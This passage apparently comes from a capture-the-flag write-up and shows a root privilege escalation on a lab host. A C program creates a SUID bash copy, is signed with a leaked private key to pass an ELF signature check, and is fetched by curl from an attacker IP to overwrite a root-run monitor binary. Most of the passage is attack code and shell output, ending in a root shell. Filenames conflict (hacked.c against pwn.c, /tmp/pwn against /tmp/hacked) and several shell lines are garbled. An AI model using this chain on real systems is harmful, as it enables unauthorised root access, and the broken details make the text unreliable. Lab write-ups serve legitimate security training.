Unlike typical Linux ELF binaries, which don’t include a .text_sig section by default, this custom section must have been appended after compilation.

The presence of .text_sig itself is a clue—it acts as a signature marker. After some research, we find that the binary is signed using linux-elf-binary-signer, a tool that embeds a cryptographic signature into a dedicated ELF section called .text_sig. This signature ensures the integrity of the .text segment.

With this understanding, the path forward is clear. Next, we’ll create a minimal SUID spawner:

/**
 * hacked.c
 */
#include <unistd.h>
#include <stdlib.h>

int main() {
    setuid(0);
    setgid(0);

    system("cp /bin/bash /tmp/pwn && chmod +s /tmp/pwn");

    return 0;
}

Compile

gcc -static -o pwn pwn.c

Next, utilize the leaked key.pem private key—using the same file for the x509 certificate since it includes the public key as well:

./elf-sign sha256 key.pem key.pem pwn monitor

This command signs pwn and generates monitor containing a valid .text_sig section:

$ ./elf-sign -h
Usage: elf-sign [-h] <hash-algo> <key> <x509> <elf-file> [<dest-file>]
=h, display the help and exit

Sign the <elf-file> to an optional <dest-file> with
private key in <key> and public key certificate in <x509>
and the digest algorithm specified by <hash-algo>. If no
<dest-file> is specified, the <elf-file> will be backup to
<elf-file>.old, and the original <elf-file> will be signed.

$ ./elf-sign sha256 key.pem key.pem pwn monitor
--- 64-bit ELF file, version 1 (CURRENT), little endian.
--- 28 sections detected.
--- Section 0006 [.text] detected.
--- Length of section [.text]: 501773
--- Signature size of [.text]: 458
--- Writing signature to file: .text_sig
--- Removing temporary signature file: .text_sig

$ readelf -S monitor | grep sig
[28] .text_sig          PROGBITS        0000000000000000000000       000be198

Upload the crafted malicious monitor binary to overwrite the original.

eric@era:/opt/AV/periodic-checks$ mv monitor monitor.bak

eric@era:/opt/AV/periodic-checks$ curl -O 10.10.12.7/monitor
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  761k  100  761k    0     0   158k      0  0:00:04  0:00:04 --:--:--  174k

eric@era:/opt/AV/periodic-checks$ chmod +x monitor

eric@era:/opt/AV/periodic-checks$ ls -l
ls -l
total 788
-rwxrwxr-x 1 eric eric 778568 Jul 27 10:36 monitor
-rwxrw---- 1 root devs  16544 Jul 27 10:36 monitor.bak
-rw-rw---- 1 root devs    103 Jul 27 10:36 status.log

Until the log updates and replies SUCCESS:

eric@era:/opt/AV/periodic-checks$ tail st*

[ERROR] Executable not signed. Tampering attempt detected. Skipping.
[*] System scan initiated...
[*] No threats detected. Shutting down...
[SUCCESS] No threats detected.

When executed, the compromised monitor will create an SUID-enabled bash binary at /tmp/hacked with root privileges.

er.ic@era: /opt/AV/pertodic-checks$ cat st*
cat st*

[SUCCESS] No threats detected.
eric@era:/opt/AV/periodic-checks$ cat st*
cat st*

[SUCCESS] No threats detected.
eric@era: /opt/AV/periodic-checks$ ll /tmp

ll /tmp

total 1416

drwxrwxrwt 13 root root 4096 Jul 27 of
drwxr-xr-x 20 root root 4096 Jul 22 08:41 ../
drwxrwxrwt. root root 4096 Jul 27 -ICE-unix/
drwxrwxrwt root root 4096 Jul 27 -Test-unix/
drwxrwxrwt root root 4096 Jul 27 -X11-unix/
drwxrwxrwt root root 4096 Jul 27 -XIM-untx/
drwxrwxrwt root root 4096 Jul 27 02:48 .font-unix/
-rwsr-Sr-x root root 1396520 Jul 27 10:45 hacked*
...

eric@era:/opt/AV/periodic-checks$ /tmp/hacked -p 
/tmp/hacked -p
hacked-5.1# id
id
uid=1000(eric) gid=1000(eric) euid=0(root) egid=0(root) groups=0( root) ,1000(eric),1001( devs)
hacked-5.1# cat /root/root.txt
f85s9ss5*****

</div> <div> <h1>ROOTED</h1>

</div>

</div> </div>

</div>